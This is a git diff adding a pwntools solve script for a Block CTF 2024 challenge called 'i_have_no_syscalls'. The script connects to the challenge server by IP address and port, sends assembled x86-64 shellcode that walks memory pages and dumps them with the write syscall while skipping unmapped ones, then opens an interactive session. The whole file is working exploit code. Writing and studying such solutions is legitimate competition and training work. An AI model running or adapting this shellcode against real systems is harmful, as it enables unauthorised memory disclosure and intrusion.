solve script

blockctf_2024/i_have_no_syscalls/a.py

@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./ihnsaims", checksec=False)
+# r = process("./ihnsaims flag{fake_flag}", shell=True)
+r = remote("54.85.45.101", 8002)
+
+# funcs
+s = lambda a: r.sendafter(b"!\n", a)
+
+# write
+s(b"1")
+
+# shellcode
+sc = """
+lea r12, [rdx]
+a:
+lea r12, [r12+0x1000]
+mov rdi, 1
+mov rsi, r12
+mov rdx, 0x1000
+mov rax, 1
+syscall
+cmp rax, -14
+je a
+jne b
+b:
+xor rdi, rdi
+mov rax, 231
+syscall
+"""
+sc = asm(sc)
+s(sc)
+
+r.interactive()